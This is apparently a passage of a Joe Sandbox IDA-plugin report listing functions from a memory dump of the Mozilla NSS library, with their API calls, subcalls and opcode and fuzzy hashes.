Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$Alloc_ArenaArena_memset$EncodeFreeItem_
String ID:
API String ID: 204871323-0
Opcode ID: ca7225d5b15ee33aa8e15a12603a90d6c8c2fe18293d5484a9a042363ad4751b
Instruction ID: a5e10611128c184123d7d264aa1cacdb9929f72e9e51420b5f454f3315356395
Opcode Fuzzy Hash: ca7225d5b15ee33aa8e15a12603a90d6c8c2fe18293d5484a9a042363ad4751b
Instruction Fuzzy Hash: 43511571F082999FDB108E58D8847AEB7B9FF49318F294129EC59A7B40D331AC10CBD1

Function 6CACDEF0 Relevance: 10.7, APIs: 7, Instructions: 159COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CACDF37
EnterCriticalSection.KERNEL32(?), ref: 6CACDF4B
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CACDF96
PR_SetError.NSS3(00000000,00000000), ref: 6CACE02B
PR_Unlock.NSS3(?), ref: 6CACE07E
PR_SetError.NSS3(FFFFE001,00000000), ref: 6CACE090
PR_Unlock.NSS3(?), ref: 6CACE0AF

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Error$Unlock$CriticalEnterSectionValue
String ID:
API String ID: 4073542275-0
Opcode ID: 06f69eec8b5d3cc8f085ec6966e0f3a83ccc17a5f909b9f4fb74ebd6bda418b0
Instruction ID: 69ae8b8abb6727ffc625371dd4f7c25153685119e23746f38909bdf9be6608de
Opcode Fuzzy Hash: 06f69eec8b5d3cc8f085ec6966e0f3a83ccc17a5f909b9f4fb74ebd6bda418b0
Instruction Fuzzy Hash: C251AD31B80600CFEB209E28D846B5A73F5FF45318F244929E89A47B91D731E988CBD3

Function 6CACBCF0 Relevance: 10.6, APIs: 7, Instructions: 142memoryCOMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6CACBD1E

Part of subcall function 6CAA2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CAA2F0A
Part of subcall function 6CAA2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CAA2F1D

Part of subcall function 6CAE57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CAAB41E,00000000,00000000,?,00000000,?,6CAAB41E,00000000,00000000,00000001,?), ref: 6CAE57E0
Part of subcall function 6CAE57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CAE5843

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CACBD8C

Part of subcall function 6CAFFAB0: free.MOZGLUE(?,-00000001,?,?,6CA9F673,00000000,00000000), ref: 6CAFFAC7

CERT_DestroyCertList.NSS3(00000000), ref: 6CACBD9B
SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6CACBDA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CACBE3A

Part of subcall function 6CAA3E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAA3EC2
Part of subcall function 6CAA3E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CAA3ED6
Part of subcall function 6CAA3E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CAA3EEE
Part of subcall function 6CAA3E60: PR_CallOnce.NSS3(6CC02AA4,6CB012D0), ref: 6CAA3F02
Part of subcall function 6CAA3E60: PL_FreeArenaPool.NSS3 ref: 6CAA3F14
Part of subcall function 6CAA3E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CAA3F27

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CACBE52

Part of subcall function 6CAA2E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6CAA2CDA,?,00000000), ref: 6CAA2E1E
Part of subcall function 6CAA2E00: SECITEM_DupItem_Util.NSS3(?), ref: 6CAA2E33
Part of subcall function 6CAA2E00: TlsGetValue.KERNEL32 ref: 6CAA2E4E
Part of subcall function 6CAA2E00: EnterCriticalSection.KERNEL32(?), ref: 6CAA2E5E
Part of subcall function 6CAA2E00: PL_HashTableLookup.NSS3(?), ref: 6CAA2E71
Part of subcall function 6CAA2E00: PL_HashTableRemove.NSS3(?), ref: 6CAA2E84
Part of subcall function 6CAA2E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6CAA2E96
Part of subcall function 6CAA2E00: PR_Unlock.NSS3 ref: 6CAA2EA9

PR_SetError.NSS3(FFFFE013,00000000), ref: 6CACBE61

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$Item_$Zfree$ArenaHashTable$CertListPoolfree$AllocAlloc_Arena_CallCopyCriticalDecodeDestroyEnterErrorFreeInitK11_LookupOnceQuickRemoveSectionTokensUnlockValue
String ID:
API String ID: 2178860483-0
Opcode ID: 20160abf5f2db0741802eb9d18d39de91d0173276a589c07041a91f64a42b2a9
Instruction ID: 20fd8528a50f2cceaf0def7a419b65411a1a2bcfcf36e3cb0b5240d71d8bf183
Opcode Fuzzy Hash: 20160abf5f2db0741802eb9d18d39de91d0173276a589c07041a91f64a42b2a9
Instruction Fuzzy Hash: 8B4114B5B00210AFC710DF68ED80A6A77F4EF49718F044268F91997711E732EC99CB92

Function 6CAEAC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6CAEAB3E,?,?,?), ref: 6CAEAC35

Part of subcall function 6CACCEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6CACCF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6CAEAB3E,?,?,?), ref: 6CAEAC55

Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB010F3
Part of subcall function 6CB010C0: EnterCriticalSection.KERNEL32(?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0110C
Part of subcall function 6CB010C0: PL_ArenaAllocate.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01141
Part of subcall function 6CB010C0: PR_Unlock.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01182
Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0119C

PK11_CipherOp.NSS3(?,00000000,?,?,?,?,?,?,?,?,?,?,?,6CAEAB3E,?,?), ref: 6CAEAC70

Part of subcall function 6CACE300: TlsGetValue.KERNEL32 ref: 6CACE33C
Part of subcall function 6CACE300: EnterCriticalSection.KERNEL32(?), ref: 6CACE350
Part of subcall function 6CACE300: PR_Unlock.NSS3(?), ref: 6CACE5BC
Part of subcall function 6CACE300: PK11_GenerateRandom.NSS3(00000000,00000008), ref: 6CACE5CA
Part of subcall function 6CACE300: TlsGetValue.KERNEL32 ref: 6CACE5F2
Part of subcall function 6CACE300: EnterCriticalSection.KERNEL32(?), ref: 6CACE606
Part of subcall function 6CACE300: PORT_Alloc_Util.NSS3(?), ref: 6CACE613

PK11_GetBlockSize.NSS3(00000133,00000000), ref: 6CAEAC92
PK11_DestroyContext.NSS3(?,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,6CAEAB3E), ref: 6CAEACD7
PORT_Alloc_Util.NSS3(?), ref: 6CAEAD10
memcpy.VCRUNTIME140(00000000,?,FF850674), ref: 6CAEAD2B

Part of subcall function 6CACF360: TlsGetValue.KERNEL32(00000000,?,6CAEA904,?), ref: 6CACF38B
Part of subcall function 6CACF360: EnterCriticalSection.KERNEL32(?,?,?,6CAEA904,?), ref: 6CACF3A0
Part of subcall function 6CACF360: PR_Unlock.NSS3(?,?,?,?,6CAEA904,?), ref: 6CACF3D3

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: K11_$Value$CriticalEnterSection$Alloc_UnlockUtil$ArenaContext$AllocateBlockCipherCreateDestroyFreeGenerateRandomSizememcpy
String ID:
API String ID: 2926855110-0
Opcode ID: 09b40de754ff19d7932614d6289ae6065934701b74bc0c66e86553ade3cbed05
Instruction ID: 72b2064d1c0096dee0428f830727cfb8219b755f071e5cf727fcbc87d62363a0
Opcode Fuzzy Hash: 09b40de754ff19d7932614d6289ae6065934701b74bc0c66e86553ade3cbed05
Instruction Fuzzy Hash: 3E3126B1E002055FEB008FA9CC409AF7BB7EFC8328B198128E8159B740EB319D95D7E1

Function 6CAC8C70 Relevance: 10.6, APIs: 7, Instructions: 110stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6CAC8C7C

Part of subcall function 6CB69DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CBB0A27), ref: 6CB69DC6
Part of subcall function 6CB69DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CBB0A27), ref: 6CB69DD1
Part of subcall function 6CB69DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CB69DED

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CAC8CB0
TlsGetValue.KERNEL32 ref: 6CAC8CD1
EnterCriticalSection.KERNEL32(?), ref: 6CAC8CE5
PR_Unlock.NSS3(?), ref: 6CAC8D2E
PR_SetError.NSS3(FFFFE00F,00000000), ref: 6CAC8D62
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CAC8D93

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
String ID:
API String ID: 3131193014-0
Opcode ID: 51a18053eab0ae62b1ebdc030573d99ce4302f8640c1b7f036a707df6b29a549
Instruction ID: 1cbaf24116bde70140afcd0e512803a46d3ee9a9cca8f8c76bd1b0ab1de79526
Opcode Fuzzy Hash: 51a18053eab0ae62b1ebdc030573d99ce4302f8640c1b7f036a707df6b29a549
Instruction Fuzzy Hash: 8C316871B01205AFEB009F68DC447DAB7B4FF15318F18013AEA1967B50EB71A9A8C7C2

Function 6CB09D60 Relevance: 10.6, APIs: 7, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,00000000,?,?,00000000,?,6CB09C5B), ref: 6CB09D82

Part of subcall function 6CB014C0: TlsGetValue.KERNEL32 ref: 6CB014E0
Part of subcall function 6CB014C0: EnterCriticalSection.KERNEL32 ref: 6CB014F5
Part of subcall function 6CB014C0: PR_Unlock.NSS3 ref: 6CB0150D

PORT_ArenaGrow_Util.NSS3(?,?,00000000,?,6CB09C5B), ref: 6CB09DA9

Part of subcall function 6CB01340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6CAA895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA9F599,?,00000000), ref: 6CB0136A
Part of subcall function 6CB01340: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6CAA895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA9F599,?,00000000), ref: 6CB0137E
Part of subcall function 6CB01340: PL_ArenaGrow.NSS3(?,6CA9F599,?,00000000,?,6CAA895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA9F599,?), ref: 6CB013CF
Part of subcall function 6CB01340: PR_Unlock.NSS3(?,?,6CAA895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA9F599,?,00000000), ref: 6CB0145C

PORT_ArenaGrow_Util.NSS3(?,?,?,?,?,?,?,?,6CB09C5B), ref: 6CB09DCE

Part of subcall function 6CB01340: TlsGetValue.KERNEL32(?,00000000,00000000,?,6CAA895A,00000000,?,00000000,?,00000000,?,00000000,?,6CA9F599,?,00000000), ref: 6CB013F0
Part of subcall function 6CB01340: PL_ArenaGrow.NSS3(?,6CA9F599,?,?,?,00000000,00000000,?,6CAA895A,00000000,?,00000000,?,00000000,?,00000000), ref: 6CB01445

PORT_ArenaAlloc_Util.NSS3(?,00000008,6CB09C5B), ref: 6CB09DDC
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,6CB09C5B), ref: 6CB09DFE
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,6CB09C5B), ref: 6CB09E43
PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,6CB09C5B), ref: 6CB09E91

Part of subcall function 6CB4C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CB4C2BF

Part of subcall function 6CB01560: TlsGetValue.KERNEL32(00000000,00000000,?,?,?,6CAFFAAB,00000000), ref: 6CB0157E
Part of subcall function 6CB01560: EnterCriticalSection.KERNEL32(B8AC9BDF,?,6CAFFAAB,00000000), ref: 6CB01592
Part of subcall function 6CB01560: memset.VCRUNTIME140(?,00000000,?), ref: 6CB01600
Part of subcall function 6CB01560: PL_ArenaRelease.NSS3(?,?), ref: 6CB01620
Part of subcall function 6CB01560: PR_Unlock.NSS3(?), ref: 6CB01639

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Arena$Util$Value$Alloc_CriticalEnterSectionUnlock$GrowGrow_$ErrorMark_Releasememset
String ID:
API String ID: 3425318038-0
Opcode ID: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction ID: 46654e30589ad64efabfcf1092cd9e2b28713ccdced68916617fa2463e7cb32e
Opcode Fuzzy Hash: ec09ca6b5ba00fa30881863b7796f78fa7ddeeb76bf669e4abd50a1f8de51863
Instruction Fuzzy Hash: D84181B4A01646AFE744DF15D840B96BBA5FF45348F148128D8184BFA0EB72E838CF91

Function 6CACDDD0 Relevance: 10.6, APIs: 7, Instructions: 106COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3(?), ref: 6CACDDEC

Part of subcall function 6CB00840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CB008B4

PK11_DigestBegin.NSS3(00000000), ref: 6CACDE70
PK11_DigestOp.NSS3(00000000,00000004,00000000), ref: 6CACDE83
HASH_ResultLenByOidTag.NSS3(?), ref: 6CACDE95
PK11_DigestFinal.NSS3(00000000,00000000,?,00000040), ref: 6CACDEAE
PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CACDEBB
PR_SetError.NSS3(FFFFE005,00000000), ref: 6CACDECC

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: K11_$Digest$Error$BeginContextDestroyFinalFindResultTag_Util
String ID:
API String ID: 1091488953-0
Opcode ID: 7567e87fb043099fd59eaa55eaaa44616f8d338e43eed706bf1a6f97064ac649
Instruction ID: 7cac8d3ca442dbfebf84a106a2625ad1cd8cc54d090caf15ee82633276a8a47b
Opcode Fuzzy Hash: 7567e87fb043099fd59eaa55eaaa44616f8d338e43eed706bf1a6f97064ac649
Instruction Fuzzy Hash: 303195B2E402146BEB01AF69AD41BBB76B8AF54708F050125ED09A7741FB31D998C6E3

Function 6CAA7E30 Relevance: 10.6, APIs: 7, Instructions: 103memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800), ref: 6CAA7E48

Part of subcall function 6CB00FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CAA87ED,00000800,6CA9EF74,00000000), ref: 6CB01000
Part of subcall function 6CB00FF0: PR_NewLock.NSS3(?,00000800,6CA9EF74,00000000), ref: 6CB01016
Part of subcall function 6CB00FF0: PL_InitArenaPool.NSS3(00000000,security,6CAA87ED,00000008,?,00000800,6CA9EF74,00000000), ref: 6CB0102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000008), ref: 6CAA7E5B

Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB010F3
Part of subcall function 6CB010C0: EnterCriticalSection.KERNEL32(?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0110C
Part of subcall function 6CB010C0: PL_ArenaAllocate.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01141
Part of subcall function 6CB010C0: PR_Unlock.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01182
Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0119C

SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6CAA7E7B

Part of subcall function 6CAFFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CAF8D2D,?,00000000,?), ref: 6CAFFB85
Part of subcall function 6CAFFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CAFFBB1

SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6CBC925C,?), ref: 6CAA7E92

Part of subcall function 6CAFB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CBD18D0,?), ref: 6CAFB095

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CAA7EA1
SECOID_FindOID_Util.NSS3(00000004), ref: 6CAA7ED1
SECOID_FindOID_Util.NSS3(00000004), ref: 6CAA7EFA

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_FindItem_Value$AllocateCopyCriticalDecodeEnterErrorFreeInitLockPoolQuickSectionUnlockcallocmemcpy
String ID:
API String ID: 3989529743-0
Opcode ID: 7f77056fc5b47f6163670e48bb02cb273ca49bf60bc11eb13514a1ce9c5359d5
Instruction ID: cd890ef9b6a01837afff41371ea0f11402bc4864a094ac58dd771985e43eba08
Opcode Fuzzy Hash: 7f77056fc5b47f6163670e48bb02cb273ca49bf60bc11eb13514a1ce9c5359d5
Instruction Fuzzy Hash: 0F31C2B2E012119BEB208FA99C40B6B77F8AF44258F194824ED55EBB45F730ED49C7E0

Function 6CAFDC10 Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,00000000,?,?,00000000,?,?,6CAFD9E4,00000000), ref: 6CAFDC30
PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,00000000,?,?,6CAFD9E4,00000000), ref: 6CAFDC4E
PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,?,6CAFD9E4,00000000), ref: 6CAFDC5A
PORT_ArenaAlloc_Util.NSS3(?,?), ref: 6CAFDC7E
memcpy.VCRUNTIME140(00000000,?,?), ref: 6CAFDCAD

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: Alloc_Util$Arenamemcpy
String ID:
API String ID: 2632744278-0
Opcode ID: d35abfd4e80404fcc18ccbb47f77b289bfd35b72735627a43d6c29945d13c50f
Instruction ID: cac353744216d79c0eb28988cb2d4a516b47534d7717904f52cb5c58dfba1e6b
Opcode Fuzzy Hash: d35abfd4e80404fcc18ccbb47f77b289bfd35b72735627a43d6c29945d13c50f
Instruction Fuzzy Hash: 27316FB5A002409FD751CF29D890B56BBF8EF15358F188429F968CBB01E771E986CBA1

Function 6CAC2E40 Relevance: 10.6, APIs: 7, Instructions: 92COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,00000038,?,6CABE728,?,00000038,?,?,00000000), ref: 6CAC2E52
EnterCriticalSection.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CAC2E66
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6CAC2E7B
EnterCriticalSection.KERNEL32(00000000), ref: 6CAC2E8F
PL_HashTableLookup.NSS3(?,?), ref: 6CAC2E9E
PR_Unlock.NSS3(?), ref: 6CAC2EAB
PR_Unlock.NSS3(?), ref: 6CAC2F0D

Memory Dump Source

Source File: 00000000.00000002.2748681193.000000006CA21000.00000020.00000001.01000000.00000009.sdmp, Offset: 6CA20000, based on PE: true

Associated: 00000000.00000002.2748640035.000000006CA20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2748972990.000000006CBBF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749042840.000000006CBFE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749081606.000000006CBFF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749117716.000000006CC00000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2749154237.000000006CC05000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ca20000_file.jbxd

Similarity

API ID: CriticalEnterSectionUnlockValue$HashLookupTable
String ID:
API String ID: 3106257965-0
Opcode ID: 480230c623a01160899e15b853bc43418f3841ba4518948803ba4e0b6e8792ab
Instruction ID: 50e4dcd724af9856d07ac698b574b8ded0d9d74492d8c102e60d069d963785e5
Opcode Fuzzy Hash: 480230c623a01160899e15b853bc43418f3841ba4518948803ba4e0b6e8792ab
Instruction Fuzzy Hash: 7331EA79B005099BEB005F68EC458AABB79FF45358B088274ED1897B11EB31DCE4C7D1

Function 6CB0CEE0 Relevance: 10.6, APIs: 7, Instructions: 79memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?,6CB0CD93,?), ref: 6CB0CEEE

Part of subcall function 6CB014C0: TlsGetValue.KERNEL32 ref: 6CB014E0
Part of subcall function 6CB014C0: EnterCriticalSection.KERNEL32 ref: 6CB014F5
Part of subcall function 6CB014C0: PR_Unlock.NSS3 ref: 6CB0150D

PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CB0CD93,?), ref: 6CB0CEFC

Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB010F3
Part of subcall function 6CB010C0: EnterCriticalSection.KERNEL32(?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0110C
Part of subcall function 6CB010C0: PL_ArenaAllocate.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01141
Part of subcall function 6CB010C0: PR_Unlock.NSS3(?,?,?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB01182
Part of subcall function 6CB010C0: TlsGetValue.KERNEL32(?,6CAA8802,00000000,00000008,?,6CA9EF74,00000000), ref: 6CB0119C

SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CB0CD93,?), ref: 6CB0CF0B

Part of subcall function 6CB00840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CB008B4

SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CB0CD93,?), ref: 6CB0CF1D

Part of subcall function 6CAFFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CAF8D2D,?,00000000,?), ref: 6CAFFB85
